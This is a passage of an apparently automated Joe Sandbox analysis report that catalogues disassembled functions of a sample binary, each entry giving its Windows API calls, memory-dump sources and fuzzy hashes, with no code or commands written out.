                                                                                                                                                    • __itow.LIBCMT ref: 00469A97
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$__itow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3379773720-0
                                                                                                                                                    • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                                                                                    • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                                                                                                                    • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                                                                                    • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                                                                                                                    Function 004499DB Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00449A80
                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$ClientMoveRectScreen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3880355969-0
                                                                                                                                                    • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                                                                                    • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                                                                                                                    • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                                                                                    • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                                                                                                                    Function 00441672 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00441722
                                                                                                                                                    • PtInRect.USER32(?,?,?), ref: 00441734
                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 004417AD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1352109105-0
                                                                                                                                                    • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                                                                                    • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                                                                                                                    • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                                                                                    • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                                                                                                                    Function 0045D1AF Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                                                                                                                    • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3321077145-0
                                                                                                                                                    • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                                                                                    • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                                                                                                                    • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                                                                                    • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                                                                                                                    Function 0042083F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                                                                                                                    • __isleadbyte_l.LIBCMT ref: 004208A6
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3058430110-0
                                                                                                                                                    • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                                                                                    • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                                                                                                                    • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                                                                                    • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                                                                                                                    Function 0045039B Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetParent.USER32(?), ref: 004503C8
                                                                                                                                                    • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                                                                                                                    • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                                                                                                                    • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Proc$Parent
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2351499541-0
                                                                                                                                                    • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                                                                                    • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                                                                                                                    • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                                                                                    • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                                                                                                                    Function 00442A83 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                                                                                                                    • TranslateMessage.USER32(?), ref: 00442B01
                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 00442B0B
                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$Peek$DispatchTranslate
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1795658109-0
                                                                                                                                                    • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                                                                                    • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                                                                                                                    • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                                                                                    • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                                                                                                                    Function 0047438B Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                                                                                                                      • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                                                                      • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                                                                      • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                                                                                    • GetCaretPos.USER32(?), ref: 004743B2
                                                                                                                                                    • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                                                                                                                    • GetForegroundWindow.USER32 ref: 004743EE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2759813231-0
                                                                                                                                                    • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                                                                    • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                                                                                                                    • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                                                                    • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                                                                                                                    Function 004494A5 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                                                                                    • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                                                                                                                    • _wcslen.LIBCMT ref: 00449519
                                                                                                                                                    • _wcslen.LIBCMT ref: 00449526
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend_wcslen$_wcspbrk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2886238975-0
                                                                                                                                                    • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                                                                                    • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                                                                                                                    • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                                                                                    • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                                                                                                                    Function 0046888B Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __setmode$DebugOutputString_fprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1792727568-0
                                                                                                                                                    • Opcode ID: 676bf48cbc0913da9d448bfa9dbb5afa6081ad4ac6e550982d94ce8568994cfe
                                                                                                                                                    • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                                                                                                                    • Opcode Fuzzy Hash: 676bf48cbc0913da9d448bfa9dbb5afa6081ad4ac6e550982d94ce8568994cfe
                                                                                                                                                    • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                                                                                                                    Function 0047A26A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                                                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Long$AttributesLayered
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2169480361-0
                                                                                                                                                    • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                                                                                    • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                                                                                                                    • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                                                                                    • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                                                                                                                    Function 00434CC9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 75stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                                                                                                                      • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                                                                                                                      • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                    • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                                                                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                                                                                                                    • String ID: cdecl
                                                                                                                                                    • API String ID: 3850814276-3896280584
                                                                                                                                                    • Opcode ID: ef10fd9676808073a4c8f1725e80f68a3f5fbe52312c97b5579e19edf3a4be4a
                                                                                                                                                    • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                                                                                                                    • Opcode Fuzzy Hash: ef10fd9676808073a4c8f1725e80f68a3f5fbe52312c97b5579e19edf3a4be4a
                                                                                                                                                    • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                                                                                                                    Function 0046D402 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                                                                                    • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                                                                                                                    • _memmove.LIBCMT ref: 0046D475
                                                                                                                                                    • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
